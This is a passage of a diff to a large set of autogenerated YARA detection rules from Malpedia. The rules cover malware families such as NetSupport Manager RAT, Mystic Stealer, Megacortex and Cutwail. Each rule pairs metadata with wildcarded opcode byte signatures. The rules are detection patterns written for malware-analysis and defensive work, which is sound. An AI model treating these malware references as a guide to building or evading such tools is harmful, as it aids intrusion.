-		$sequence_10 = { 8b4590 8b4d94 8b5588 8b758c }
-		$sequence_11 = { e8???????? 6bc007 33c9 41 c1e102 }
-		$sequence_12 = { 56 ff15???????? a3???????? 33c0 5e c3 3b0d???????? }
-		$sequence_13 = { c9 b8ffffffff 99 c3 56 8b35???????? 8bce }
-		$sequence_14 = { 83c201 8955e0 83d600 8975e4 }
-		$sequence_15 = { 51 6a00 6813000020 50 }
-		$sequence_16 = { 8b45e4 50 51 52 }
-		$sequence_17 = { 0bc8 56 57 7529 }
-		$sequence_18 = { 8bf0 e8???????? 8bc8 8bfa 8bc6 }
+		$sequence_0 = { 0fb706 8bd8 81e300f00000 81fb00300000 750e 8b5d08 }
+		$sequence_1 = { 0fb70c46 66ff444da4 8d4c4da4 40 }
+		$sequence_2 = { 0fb709 66394808 7417 8b00 }
+		$sequence_3 = { 50 8d85d8fdffff 50 e8???????? 59 59 a3???????? }
+		$sequence_4 = { 33db 897dfc 897df8 897df0 897df4 397d08 0f84a7000000 }
+		$sequence_5 = { 33db 8d443818 663b4f06 0f8395000000 56 }
+		$sequence_6 = { 0fb70c51 8b3488 8d45e0 50 }
+		$sequence_7 = { 50 8d85d8fdffff 6803010000 50 e8???????? 83c418 }
 
 	condition:
-		7 of them and filesize < 3670016
+		7 of them and filesize < 1302528
 }
-rule MALPEDIA_Win_Netsupportmanager_Rat_Auto : FILE
+rule MALPEDIA_Win_Unidentified_088_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "65413a95-8602-50e7-8fc9-1bdaa9aea637"
+		id = "b2c85c30-7ba6-55a0-9cd5-72dd624b0463"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netsupportmanager_rat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_088"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_088_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "0f21dd65c8f16f53e4a346f9dcfa8568aaa15104451879c8529729394d81f81d"
+		logic_hash = "43e33104a2b3e4b5653d5103e68195a062333638b6afc520c108067d1cded5c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138203,32 +138687,32 @@ rule MALPEDIA_Win_Netsupportmanager_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b9630010000 6a00 52 e8???????? 8b4614 83c420 }
-		$sequence_1 = { f6868000000002 745a f6868402000007 7451 8b4e68 8b3d???????? 6a03 }
-		$sequence_2 = { e8???????? eb4b 894508 894e1c 8945f0 85c0 c645fc05 }
-		$sequence_3 = { e8???????? e9???????? 8b06 8d4d08 51 8bce ff9098000000 }
-		$sequence_4 = { e8???????? c705????????01000000 8b15???????? 52 ff15???????? 5f 5e }
-		$sequence_5 = { e8???????? 8b45fc 8b4df4 8bd0 2bd1 52 8b55f8 }
-		$sequence_6 = { ff15???????? 8b4e28 6810200000 57 8d8500ffffff 6aff 50 }
-		$sequence_7 = { ff15???????? eb03 8b5de0 c745fcffffffff e8???????? 33c0 8b8d60ffffff }
-		$sequence_8 = { ff5008 8d4ddc e8???????? 8b45dc 8d4ddc ff10 84c0 }
-		$sequence_9 = { f3a5 8bc8 83e103 f3a4 81fa03000d00 750d 8d55c4 }
+		$sequence_0 = { 83c8ff 89442404 891c24 e8???????? 8b4510 6bdb0c 031e }
+		$sequence_1 = { c705????????04000000 c705????????208d4200 c705????????5beb4100 c705????????60154200 c605????????01 c705????????08000000 }
+		$sequence_2 = { c705????????20124200 c605????????01 c705????????20000000 c705????????00ac4200 c705????????12ea4100 c705????????02000000 c605????????02 }
+		$sequence_3 = { c605????????01 c705????????9fe14100 c705????????a8074200 c605????????01 c705????????a8e14100 c705????????c0074200 c705????????01000000 }
+		$sequence_4 = { c705????????a0a44200 c705????????00d64100 c705????????a8004200 c705????????00000000 c705????????04000000 c705????????04000000 66c705????????1d03 }
+		$sequence_5 = { 8b55ec 0345e0 1355e4 83c424 5b 5e 5f }
+		$sequence_6 = { 8b4de4 89c2 e8???????? 52 8b0e 89c3 }
+		$sequence_7 = { c605????????01 c705????????04000000 c705????????e08c4200 c705????????93ea4100 c705????????20134200 c605????????01 c705????????08000000 }
+		$sequence_8 = { c705????????c0ac4200 c705????????8cea4100 c705????????08134200 c605????????01 c705????????04000000 c705????????e08c4200 c705????????93ea4100 }
+		$sequence_9 = { 720d 48 891c24 89442404 e8???????? 8b470c 8b55d4 }
 
 	condition:
-		7 of them and filesize < 4734976
+		7 of them and filesize < 919552
 }
-rule MALPEDIA_Win_Crypmic_Auto : FILE
+rule MALPEDIA_Win_Mbrlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a619fa41-ae29-5844-bc2f-097bc7d852ef"
+		id = "6a472526-8a03-5ccc-a5eb-10b46b34c6da"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crypmic_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mbrlocker_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "bac6071bafa0b8d2c9908dd1914b7cdff1ecb7962c586174feb22c09b0eeeac5"
+		logic_hash = "2abe677d378843746aa6479444a4219927906b009fff2766ade4f081783dbae6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138242,32 +138726,32 @@ rule MALPEDIA_Win_Crypmic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb7d2 41 66891406 8d3409 }
-		$sequence_1 = { 66833800 75f6 8d3c72 33c0 }
-		$sequence_2 = { 8bec 83ec10 837d0800 8bc2 }
-		$sequence_3 = { ffd0 85c0 7e0e 8b4dfc 03c8 894dfc 2bf0 }
-		$sequence_4 = { 8b550c 53 2bc2 56 8945f0 }
-		$sequence_5 = { 894f04 8b4de8 894f08 668b4df0 66894f0c 668b45f2 6689470e }
-		$sequence_6 = { 8b7df0 b90e000000 f3a4 8b7dfc 6a00 }
-		$sequence_7 = { 5d c3 8b55fc 5f 8b4224 5e }
-		$sequence_8 = { ff4d08 89550c 7582 5f }
-		$sequence_9 = { 57 ffd1 8bc3 5f 5e 5b }
+		$sequence_0 = { 50 8b35???????? 8b3d???????? 6a10 68???????? }
+		$sequence_1 = { 68fe000000 68???????? ffd7 83c408 }
+		$sequence_2 = { 68ac000000 68???????? e8???????? 68ac000000 68???????? ffd7 83c408 }
+		$sequence_3 = { c705????????ba514000 c705????????00020000 68fe000000 68???????? ffd6 83c408 68ff000000 }
+		$sequence_4 = { 68ac000000 68???????? e8???????? e8???????? }
+		$sequence_5 = { 68ff000000 68ac000000 68???????? e8???????? e8???????? 68ff000000 68ac000000 }
+		$sequence_6 = { ac 30c8 aa 4a 75f9 61 c9 }
+		$sequence_7 = { 68fe000000 68???????? e8???????? 68fe000000 }
+		$sequence_8 = { 68fe000000 68???????? e8???????? e8???????? 68ff000000 68fe000000 }
+		$sequence_9 = { 31c8 e8???????? 68ac000000 68???????? }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 43008
 }
-rule MALPEDIA_Win_Retro_Auto : FILE
+rule MALPEDIA_Win_Oderoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "137253c4-c80f-5441-8b2d-57b863c1f908"
+		id = "8af6addc-ebdd-5e5f-9273-b365bc983ffd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.retro_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oderoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oderoor_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "603d0a826a833e930e158367f2340675f42fda3d145846edecb7422d26e8a466"
+		logic_hash = "705d5b4a266b0c2f312f72fd5cb1e86ab39ec049fd53173701ccf137ec51b933"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138281,32 +138765,32 @@ rule MALPEDIA_Win_Retro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b442434 8b4c2460 03c8 8bc1 89442460 e9???????? }
-		$sequence_1 = { 890a 8b44fdbc 448b44fdac 448d4820 453bc1 7e0f }
-		$sequence_2 = { 4d8bcf 4d8bc6 8bcf e8???????? 0f28742440 4883c450 415f }
-		$sequence_3 = { 488b8b50560000 488d154c810200 448bc0 e8???????? c70620010000 ba08000000 488bcb }
-		$sequence_4 = { e8???????? 83bedc120000ff 7d19 488d154db30300 488d0d9eb80300 41b899020000 e8???????? }
-		$sequence_5 = { 4b8d0408 4883c310 4883c610 f30f5946f4 f30f594ef8 0f14c0 0f14c9 }
-		$sequence_6 = { 3984cfe86c0000 7419 488d151eb90300 488d0d0fbb0300 41b8dc010000 e8???????? 488b5c2440 }
-		$sequence_7 = { 488bd9 e8???????? 85c0 740e f30f1083e4000000 4883c420 5b }
-		$sequence_8 = { 660f7f4c2430 660f6f0d???????? 660f7f442440 660f6f05???????? 660f7f4c2450 660f6f0d???????? 660f7f442460 }
-		$sequence_9 = { 8b4638 85c0 7fc5 48634658 488d0c40 48634664 4803c8 }
+		$sequence_0 = { 2deb1427d9 8c2413 b166 3b01 95 1e c194a0c0b855158d }
+		$sequence_1 = { f8 660fbdd9 6611e5 e8???????? 54 }
+		$sequence_2 = { e9???????? 6689442404 c1ce06 9c 9c 8d642440 e9???????? }
+		$sequence_3 = { 69d20a000000 e8???????? 38f4 c0f304 c1c31c 660fbafb02 89c3 }
+		$sequence_4 = { 686c193202 e8???????? 309c865a407526 b3df e04a 9b 68d69156e5 }
+		$sequence_5 = { 2b984e407fc0 c5adcaa19a9e 1882c1c921d4 06 ed }
+		$sequence_6 = { df570e 29dc 9b 7f65 197e7e a2???????? }
+		$sequence_7 = { 0fbae107 0428 55 895c240c f6d0 660fbae70f 9c }
+		$sequence_8 = { 8d642410 e9???????? 66891407 881424 9c 68f4110af5 }
+		$sequence_9 = { f1 6c aa 620b e3ed e28f 1a00 }
 
 	condition:
-		7 of them and filesize < 1409024
+		7 of them and filesize < 13688832
 }
-rule MALPEDIA_Win_Aveo_Auto : FILE
+rule MALPEDIA_Win_Pykspa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2f9547a9-d06a-5a97-a838-f674793ec8c9"
+		id = "f69b7ae8-9844-5edd-af39-3a24a60736b3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aveo_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pykspa_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "b370a3150ecdba2fa7b9c1b3f8a88674c2ef9b3deea9a9096a8ec474751f8a90"
+		logic_hash = "debf44a0a6bbb12f51a3423f6d02332e02447168503a68de6d1e19702f8f8b56"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138320,32 +138804,32 @@ rule MALPEDIA_Win_Aveo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 59 8b7508 8d34f550154100 391e 7404 }
-		$sequence_1 = { 53 56 57 8db570faffff }
-		$sequence_2 = { 8d8d10feffff e8???????? 8b95f8fdffff 52 8bf0 }
-		$sequence_3 = { 8b4de0 8d55dc 52 6800008000 }
-		$sequence_4 = { 52 8d85f4fbffff 68???????? 50 e8???????? }
-		$sequence_5 = { 50 f3a4 ff15???????? 6800010000 8d8df8feffff 6a00 51 }
-		$sequence_6 = { 53 8d4802 8955f4 56 8a51fe }
-		$sequence_7 = { 7424 8b85f4efffff 3bc7 741a }
-		$sequence_8 = { c7442418e8030000 ff15???????? 3bc7 740c 68???????? 50 }
-		$sequence_9 = { c7430801000000 e8???????? 6a06 89430c 8d4310 8d89d41a4100 5a }
+		$sequence_0 = { 59 8bc3 e9???????? e8???????? e9???????? 8d85acfeffff }
+		$sequence_1 = { 8945fc 75df 5b c9 c3 56 8b742408 }
+		$sequence_2 = { 57 8935???????? e8???????? 56 ff35???????? a3???????? 50 }
+		$sequence_3 = { 6a00 56 53 e8???????? 83c410 8d4558 50 }
+		$sequence_4 = { 59 8bf8 59 8d45fc 50 57 ff15???????? }
+		$sequence_5 = { 80385c 7410 48 49 83f901 7ff4 80385c }
+		$sequence_6 = { e8???????? 59 ff75fc ff15???????? 32c0 5e }
+		$sequence_7 = { 56 57 ff15???????? 53 6a6f }
+		$sequence_8 = { e8???????? 59 5e 5b c3 8b4a04 8b520c }
+		$sequence_9 = { 59 8d7dbd 8845bc f3ab 7777 83fe05 7272 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 835584
 }
-rule MALPEDIA_Win_Httpsuploader_Auto : FILE
+rule MALPEDIA_Win_Mystic_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "be17d448-1d90-5f75-8f13-d63b39944dc3"
+		id = "2aee59e1-5390-5b6c-ba5d-d62a358c2fe1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.httpsuploader_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mystic_stealer_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "5be7e6e5938fcb4fa9787510fb0867a1f442345e4d8453db75c177a24413afa4"
+		logic_hash = "5074dde9add0d24e82d880c50882d8de92cc1c57bceb2be1475c662a7640d829"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138359,32 +138843,32 @@ rule MALPEDIA_Win_Httpsuploader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33ff 33d2 41b806020000 6689bc2470020000 e8???????? 488d4c2451 33d2 }
-		$sequence_1 = { 33d2 33c9 897c2428 48895c2420 ff15???????? eb3b 488d0dc3bd0000 }
-		$sequence_2 = { 4883ec20 488bfa 488bd9 488d0501700000 488981a0000000 83611000 }
-		$sequence_3 = { 4c8bc0 418bd4 e8???????? 488d8dd0000000 ff15???????? }
-		$sequence_4 = { 488d0d6c280000 4533c9 ba00000040 4489442420 ff15???????? }
-		$sequence_5 = { 4c8d25cf7d0000 f0ff09 7511 488b8eb8000000 493bcc }
-		$sequence_6 = { 488d0543b50000 eb04 4883c014 4883c428 c3 4053 }
-		$sequence_7 = { 488d158e380000 488bc8 ff15???????? 4885c0 0f847a010000 }
-		$sequence_8 = { 81fa01010000 7d13 4863ca 8a44191c 4288840170fa0000 }
-		$sequence_9 = { 745e 6666660f1f840000000000 488b0d???????? 488d542440 4533c9 4533c0 ff15???????? }
+		$sequence_0 = { 8986bc160000 8bc1 668986b8160000 e9???????? 0fb786c40a0000 }
+		$sequence_1 = { 8b5608 668986b8160000 88040a ff4614 }
+		$sequence_2 = { 0f82ab000000 8bcf c1e903 0fb603 83ef08 33c6 c1ee08 }
+		$sequence_3 = { 8bd0 896c2418 6bcaec 8bc5 89442410 }
+		$sequence_4 = { 8d5e28 7409 ff7008 ff33 ff17 }
+		$sequence_5 = { 3bc6 0f46f0 8b4738 56 03c1 }
+		$sequence_6 = { 896c2418 6bcaec 8bc5 89442410 03f9 8bcd 83ea01 }
+		$sequence_7 = { 8b87a0160000 89542418 881401 ff87a0160000 8b97a0160000 }
+		$sequence_8 = { 6648 89742410 0fb7d0 8b87a0160000 }
+		$sequence_9 = { 8b4f6c 8b472c 2bce 2d06010000 }
 
 	condition:
-		7 of them and filesize < 190464
+		7 of them and filesize < 512000
 }
-rule MALPEDIA_Win_Unidentified_112_Auto : FILE
+rule MALPEDIA_Win_Unidentified_041_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bca61e0b-9af5-5227-9c81-6d76a750fd95"
+		id = "b9d7c571-d170-593a-8f70-0469676cb185"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_112"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_112_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_041_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "bc9d9c0da4edb02fe1e586c7d9968e528daf3c2c022493f4878a3ccbbc90f116"
+		logic_hash = "f4d0787e07f3ceed2cd8cf3663fb1191bdc709f813ee4ffdf4c24d0d1a2d3c75"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138398,32 +138882,32 @@ rule MALPEDIA_Win_Unidentified_112_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f20f70dbd4 660f70dbd4 660fdbda 660fd4c3 4883c002 4839c2 75d3 }
-		$sequence_1 = { e9???????? 0fb615???????? 84d2 0f8456fcffff 0fb6c2 83f801 0f8426010000 }
-		$sequence_2 = { eb7e b107 488955f0 884e01 c60603 3c02 723a }
-		$sequence_3 = { ff10 488b4500 488b5008 4885d2 488b7df0 488b4df8 7409 }
-		$sequence_4 = { eb10 eb0e 0fb7474c 0fb74df8 66894f4c 31db 89c1 }
-		$sequence_5 = { ff15???????? 488bbdc8040000 488b9d70050000 488b8d80050000 ff15???????? 4883bd9005000000 740d }
-		$sequence_6 = { 751c 83f801 0f8574ffffff b8ffffffff 4883c420 5b c3 }
-		$sequence_7 = { ffe0 41c684246001000001 4d8b742410 4d8b7c2418 488d8db0030000 e8???????? 488d8db0030000 }
-		$sequence_8 = { ffc8 418987fc280000 83f803 0f823efbffff 89c1 4c8d05ad431200 ba03000000 }
-		$sequence_9 = { eb56 0f10b708050000 488b9f08050000 48c7870805000003000000 4883fb03 0f8493000000 488d4da0 }
+		$sequence_0 = { 8bf0 8d45f4 50 8d45f0 50 56 8d45f8 }
+		$sequence_1 = { 64a300000000 8bf1 33ff 8d4c2418 897c240c e8???????? }
+		$sequence_2 = { ffb5f8bfffff ff15???????? eb67 8d85fcbfffff 50 57 57 }
+		$sequence_3 = { 6a4a 66894588 83c07d 6689458a 58 6a08 6689458c }
+		$sequence_4 = { ff75fc 56 e8???????? 59 59 2bf7 5f }
+		$sequence_5 = { eb57 8b45f8 85c0 0f8487000000 8365e000 85c0 7420 }
+		$sequence_6 = { 50 8d4b04 c78424d400000003000000 e8???????? 83bc248400000010 0f82c1040000 ff742470 }
+		$sequence_7 = { ffd6 8bd0 8d4dc0 e8???????? 68???????? 8bd0 c645fc01 }
+		$sequence_8 = { 0f43cf b8???????? 2bc1 50 8d45bc }
+		$sequence_9 = { 3905???????? 7f2a 3d00010000 7d23 8b5218 85d2 0f849f000000 }
 
 	condition:
-		7 of them and filesize < 7317504
+		7 of them and filesize < 1097728
 }
-rule MALPEDIA_Win_Winsloader_Auto : FILE
+rule MALPEDIA_Win_Megacortex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a9fc14a-5291-5130-a2b1-9b0355619f7f"
+		id = "ada38623-7613-5dfe-bdcd-0251e4cadd44"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.winsloader_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.megacortex_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "55e07c31479b98d0a2305c5dcdb238979b21006495ecfde106eb27274a497408"
+		logic_hash = "708d38e954539c490225999d6efcff9513f99a24765329194cd39e598c2360c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138437,38 +138921,32 @@ rule MALPEDIA_Win_Winsloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 e8???????? 68???????? 8d743e06 e8???????? }
-		$sequence_1 = { 83c40c 6800040000 8d8dfcf7ffff 51 }
-		$sequence_2 = { e8???????? 66898435fcfbffff b8???????? 83c410 8d4801 8da42400000000 }
-		$sequence_3 = { 8d95fcfbffff 52 0590120000 b920010000 }
-		$sequence_4 = { 84d2 75f9 2bc7 8bf8 b8???????? 8d5001 }
-		$sequence_5 = { 2bc1 0fb7c0 57 8bf8 }
-		$sequence_6 = { 57 8d45dc 50 8d4e10 51 }
-		$sequence_7 = { b8???????? 8d7801 8a10 40 84d2 }
-		$sequence_8 = { 75f9 2bc6 0fb6f0 8d5601 52 88841dfefbffff }
-		$sequence_9 = { 8d0485f83a0110 50 8d85c0f8ffff 03c7 50 e8???????? 8b85bcf8ffff }
-		$sequence_10 = { 83c40c 0fb795f0f3ffff 0395f8f3ffff 8995f8f3ffff }
-		$sequence_11 = { 8b74241c 8bcf 2bf7 8bd3 8a040e 8d4901 8841ff }
-		$sequence_12 = { e9???????? c745e0547c0110 eba2 894ddc c745e0547c0110 e9???????? c745dc03000000 }
-		$sequence_13 = { be???????? f3a5 66a5 a4 8b8decf3ffff 81c1df000000 }
-		$sequence_14 = { 83c201 8995a4f3ffff 8b85b0f3ffff 8a08 }
-		$sequence_15 = { 83e03f c1ff06 6bd830 8b04bdc0c00110 }
+		$sequence_0 = { 50 e8???????? 8bf0 83c40c 85f6 756e ff751c }
+		$sequence_1 = { 03c8 890a 8b55e8 5f 0f114204 66897214 5e }
+		$sequence_2 = { 8b75c8 8975dc 8d4aff f7d9 1bc9 23c1 03c2 }
+		$sequence_3 = { 8985a8fbffff 85c0 0f845e020000 50 e8???????? 0fb6d8 0f57c0 }
+		$sequence_4 = { 8d46ff f7d8 1bc0 23c2 8bd7 03f0 8d7d0c }
+		$sequence_5 = { 23ca 03c1 8906 8b45d8 51 8bf4 8d4dd8 }
+		$sequence_6 = { 8b45f8 8d75e8 ff7508 51 8d50ff 8bfc 8d4df8 }
+		$sequence_7 = { ff5004 8bf7 85ff 0f8562ffffff 8b4df4 64890d00000000 }
+		$sequence_8 = { f7d8 895dfc 1bc0 23c1 8b10 2bc6 83e2fd }
+		$sequence_9 = { e8???????? 8d4598 c645fc05 50 8d45d8 83cb0a 50 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 1556480
 }
-rule MALPEDIA_Win_Unidentified_042_Auto : FILE
+rule MALPEDIA_Win_Cutwail_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7505cdf-3b67-54d1-b86a-09699ebba78c"
+		id = "74edd1da-0a31-5dc7-9e3f-137bbcc67ffb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_042_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cutwail_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "e1a66a5b2b9486f9685ec5c1def3b62ee2d1680cb3c8b0c5674fcab890803964"
+		logic_hash = "19ab3f1dd76c95a9fd39a987b454b861d51946958edf6894a04ce0a4e884e4fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138482,32 +138960,38 @@ rule MALPEDIA_Win_Unidentified_042_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a20 ba???????? 8bde e8???????? 83c404 85c0 7410 }
-		$sequence_1 = { 52 8b9578ffffff 50 53 8d8d7cffffff e8???????? 83c414 }
-		$sequence_2 = { 33f7 8b7df0 337dec 23f8 337df0 03f7 8bbdd8feffff }
-		$sequence_3 = { e8???????? 83c408 85c0 7809 7e07 03f0 83fe04 }
-		$sequence_4 = { 0bfa 48 75f1 eb03 0fb6f8 }
-		$sequence_5 = { 25efff0000 66c1e104 660bc8 66898b50020000 8a4648 2401 0fb6c0 }
-		$sequence_6 = { c7855cfaffff25da3f2e c78560fafffffafe28be c78564faffffaff05b42 c78568faffff0973699c c7856cfaffffb195ef80 c78570faffffdccc6129 c78574faffff2b44064a }
-		$sequence_7 = { 1bc0 2556ffffff 33cd 83c011 e8???????? 8be5 }
-		$sequence_8 = { 8b7df4 8b45e8 83f903 0f8dad000000 85c9 0f88a5000000 8bd1 }
-		$sequence_9 = { 6824a4e360 681c781e53 6890000000 6a01 6a02 e8???????? 8b4df8 }
+		$sequence_0 = { 33d2 f775e8 8b45ec 6a05 }
+		$sequence_1 = { 8b8d64feffff 038d4cfeffff 8b9544feffff 8b048d30f62004 8902 8b8d44feffff 8b9548feffff }
+		$sequence_2 = { 7434 39750c 762f 2bdf }
+		$sequence_3 = { 837d0c00 7406 837d1000 7d04 32c0 eb57 c745fc00000000 }
+		$sequence_4 = { ff7524 8b7530 8d457c 50 }
+		$sequence_5 = { 83c404 8985e4fdffff 6a07 e8???????? 83c404 }
+		$sequence_6 = { 7d07 c68563feffff01 0fb69563feffff 83fa01 }
+		$sequence_7 = { ff15???????? 8b4dfc c7410400000000 6830750000 ff15???????? 8b55fc }
+		$sequence_8 = { 0f84ab020000 8b4564 ff30 8b4d4c }
+		$sequence_9 = { 83c40c 6810270000 ff15???????? 33c0 }
+		$sequence_10 = { 7d6e ff15???????? 89855cfeffff 8b8d5cfeffff 3b8d68feffff }
+		$sequence_11 = { 85c0 8945ec 7425 803b34 }
+		$sequence_12 = { e8???????? 8945f8 837df8ff 7504 32c0 eb27 }
+		$sequence_13 = { 8b8d5cfeffff 3b8d68feffff 730e 8b955cfeffff 899568feffff eb46 8b8568feffff }
+		$sequence_14 = { ff75f8 8d8554feffff 56 50 }
+		$sequence_15 = { 03fb 8b5df0 83c40c ff4df4 }
 
 	condition:
-		7 of them and filesize < 516096
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Bandook_Auto : FILE
+rule MALPEDIA_Win_Onionduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e41ee65d-d778-576e-8219-d5b7551a8280"
+		id = "938d9d3c-e9aa-58a2-a276-ad33d72e5ddf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bandook_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.onionduke_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "3158dd6369626bf2143d645ab9a0e41f6f517c0e8f9383586a9041884da647b4"
+		logic_hash = "68b93f2d8ab375a631a7b5d240fe20b360c3a52f2b84ec1bedaa31bed5aee8b0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138521,32 +139005,32 @@ rule MALPEDIA_Win_Bandook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 752d ff35???????? 8b3e 8d4598 8b7604 68???????? }
-		$sequence_1 = { 8945f8 8b4508 53 8b1d???????? 56 8b08 8b4004 }
